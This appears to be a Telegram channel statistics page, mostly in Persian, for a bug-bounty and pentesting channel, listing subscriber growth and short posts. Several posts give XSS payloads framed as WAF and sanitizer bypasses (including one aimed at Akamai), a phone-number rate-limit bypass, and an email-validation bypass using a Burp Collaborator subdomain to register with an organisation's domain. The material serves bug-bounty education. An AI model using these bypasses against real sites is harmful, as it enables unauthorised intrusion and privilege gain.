Chillsec
رفتن به کانال در Telegram
464
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز
در حال بارگیری داده...
جذب مشترکین
ژوئن '25
ژوئن '25
+152
در 1 کانالها
مه '250
در 0 کانالها
Get PRO
آوریل '25
+38
در 0 کانالها
Get PRO
مارس '250
در 0 کانالها
Get PRO
فوریه '25
+93
در 0 کانالها
Get PRO
ژانویه '250
در 1 کانالها
Get PRO
دسامبر '24
+15
در 1 کانالها
Get PRO
نوامبر '240
در 0 کانالها
Get PRO
اکتبر '240
در 0 کانالها
Get PRO
سپتامبر '24
+1
در 1 کانالها
Get PRO
اوت '240
در 0 کانالها
Get PRO
ژوئیه '24
+26
در 0 کانالها
Get PRO
ژوئن '240
در 0 کانالها
Get PRO
مه '240
در 0 کانالها
Get PRO
آوریل '24
+14
در 0 کانالها
Get PRO
مارس '240
در 0 کانالها
Get PRO
فوریه '24
+127
در 0 کانالها
پستهای کانال
| 2 | +7 0-CourseIntro.pdf | 144 |
| 3 | +2 android_kernel.pdf | 217 |
| 4 | ریسورس های خوبیه
استفاده کنیدش | 309 |
| 5 | +4 android_part1.pdf | 349 |
| 6 | سایت https://pocorexp.nsa.im/ همهی CVEها رو فهرست کرده و اگر برای هرکدوم اکسپلویت پابلیک وجود داشته باشه، اون رو هم پایینش قرار میده. | 172 |
| 7 | <42 foo="<img src=x onerror=alert(1)//">test</42> | 338 |
| 8 | بدون متن... | 326 |
| 9 | <22 foo="<img src=x onerror='alert(1)'">test</22>
this payload may help you to bypass WAF or trick sanitizers | 269 |
| 10 | جاهایی که rate limit روی شماره کار میکنه، میتونیم با اضافه کردن + به +98 بایپسش کنیم.
#rate_limit_bypass | 279 |
| 11 | Iframe attacks:
https://castbox.fm/vb/798626958 | 505 |
| 12 | Mac os inside docker:
https://github.com/dockur/macos | 519 |
| 13 | Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
@GitBook_s | 570 |
| 14 | رضا یکی از خفن ترین و بهترین استاداییه که من داشتم.
بشدت کارش خفنه.
اگه تونستید حتما شرکت بکنید | 671 |
| 15 | توضیحات ثبت نام منتورینگ که درواقع نقشه راه این دوره است:
منتورینگ شامل ۴۰۰ ساعت ویدیو ضبط شده است که شامل یک سری دوره های مخصوص منتورینگ و یکی سری دوره های من در طول مدت کوچینگ مادام العمر خواهد بود(البته در صورت انجام رفتار خلاف قوانین مثل نشر ویدیو یا همکاری با تیم ها و جاهای دیگر که باعث شک در نقض محرمانگی شود میتواند باعث ریموو شدن کاربر گردد دلیل این موضوع مشکل است: در لایو هانت های منتورینگ سناریو های پیشرفته و متفاوت روی تارگت های باگ بانتی انجام میپذیرد).
پرسش و پاسخ، لایو هکینگ و لایو های دائم هفتگی و ماهانه به همراه اپدیت و اپگرید کامل دوره ها که به صورت رایگان در طول زمان کوچینگ اختیار دانشجویان قرارمیگیرد، در منتورینگ هردانشجو میتواند در طول روز سوالاتاش را مستقیم از شخص مدرس بپرسد یا از گروه های مربوط به منتورینگ استفاده کند
مواردی که تا اینجا تکمیل شده در منتورینگ
بخش اینترو و استارت پن تست وب اپلیکیشن، api, دیتابیس ها sql & nos l
برنامه نویسی جی اس (client side & server side)و مطالب پایه وب هکینگ
مطالبسطح متوسط و اکسپرت وب هکینگ که به حملات api ها نیز پرداخته شده است
باگ بانتی و خودکار سازی حملات
اکسپلویت نویسی با پایتون
سرویس هانتینگ
موارد در حال تکمیل
RedTeam
تمامی موارد از پیشنیاز اغاز میشود تا سطح
پیشرفته
تمام سطوح هرچند یکبار بسته به نیاز و تغییرات، اپدیت و اپگرید خواند شد
تمام پشتیبانی دانشجویان توسط خود من انجام میگردد
برای ثبت نام:
Page instagram: PentesterLand پیام دهید | 457 |
| 16 | اینجا برای اینکه امکان ثبت نام در سامانه میسر باشه باید با یکی از ایمیل های معتبری که قبلا تعریف شده ثبت نام انجام بشه مثل:
example@immuniweb.com
همونجور که میدونید Burp Collaborator امکان دریافت SMTP Connection رو هم داره.
پس ما میتونیم با قرار دادن دامین مورد نظر در سابدامین Collaborator خودمون این Validation رو بایپس کنیم:
example@immuniweb.com.Collaborator.com
به همین سادگی امکان دور زدن این مکانیزم وجود داره،
نکته ایی که مهمه اینه شما میتونید در جاهای متنوعی مخصوصا جاهایی Role های مختلف و سطح دسترسی های مختلفی داره ثبت نام رو انجام بدید ممکنه اگر با ایمیل معتبر سازمان ثبت نام کنید، ممکنه به صورت پیشفرض دسترسی سطح بالاتری بهتون اختصاص داده بشه.
#bugbounty
#challange
#bugbountytips
#testcase | 360 |
| 17 | https://github.com/m14r41/PentestingEverything | 477 |
| 18 | amazing nginx root me challange:
https://www.root-me.org/en/Challenges/Web-Server/Nginx-Root-Location-Misconfiguration | 385 |
| 19 | https://thecyberneh.github.io/posts/MicrosoftBugbounty/ | 470 |
| 20 | https://blog.pspaul.de/posts/bench-press-leaking-text-nodes-with-css/ | 443 |
